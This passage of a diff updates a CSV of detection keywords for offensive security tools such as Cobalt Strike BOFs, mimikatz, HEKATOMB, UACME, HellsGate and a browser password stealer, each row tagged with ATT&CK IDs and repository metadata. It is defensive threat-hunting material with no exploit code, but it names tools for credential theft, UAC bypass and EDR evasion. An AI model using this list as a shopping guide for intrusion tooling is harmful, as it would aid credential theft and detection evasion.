TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*hd-launch-cmd *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" "*headers/exploit.h*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*headers/HandleKatz.h*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","","N/A","","","" "*HeapCrypt-main*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" @@ -11193,16 +11344,16 @@ "*hekatomb*-hashes *","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" "*hekatomb-*-py3-none-any.whl*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" "*hekatomb@thiefin.fr*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" -"*hekatomb_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*Hello from DCShadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*Hello From sadsad Team*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*hekatomb_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Hello from DCShadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Hello From sadsad Team*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*HelloReflectionWorld.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*hellsgate.asm*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*HellsGate.exe*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*HellsGate.sln*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*HellsGate.vcxproj*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*help\dll.txt*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" -"*helpers.gpoddity_smbserver*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*helpers.gpoddity_smbserver*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*Henkru/cs-token-vault*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*henry-richard7/Browser-password-stealer*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*Heroinn FTP*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" @@ -11214,89 +11365,91 @@ "*HeroinnApp*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*HeroinnProtocol*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*HeroinnServerCommand*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" -"*hfiref0x/UACME*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*hfiref0x/UACME*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*hfiref0x/WDExtract*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Hibr2Dmp.exe*","offensive_tool_keyword","Hibr2Dmp","Convert hiberfil.sys to a dump file with hibr2dmp (can be used with windbg to exploit lsass dump)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" -"*Hidden.Desktop.mp4*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HiddenDesktop * *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HiddenDesktop.*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HiddenDesktop.x64.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HiddenDesktop.x86.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HiddenDesktop.zip*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*hide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Hidden.Desktop.mp4*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop * *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.x64.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.x86.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.zip*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*hide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*HideProcess*","offensive_tool_keyword","HideProcess","process injection rootkit","T1055 - T1055.012 - T1055.013 - T1055.015 - T1055.017","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/landhb/HideProcess","1","1","N/A","N/A","5","499","111","2019-03-26T03:35:57Z","2017-03-07T01:30:15Z" -"*HIJACK_DLL_PATH*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*HIJACK_DLL_PATH*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*hijack_hunter *","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","0","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*hijack_remote_thread*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*hijackablepath.c*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*hijackablepath.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*hijackCLSIDpersistence.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*hijackDll*WINMM.dll*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" 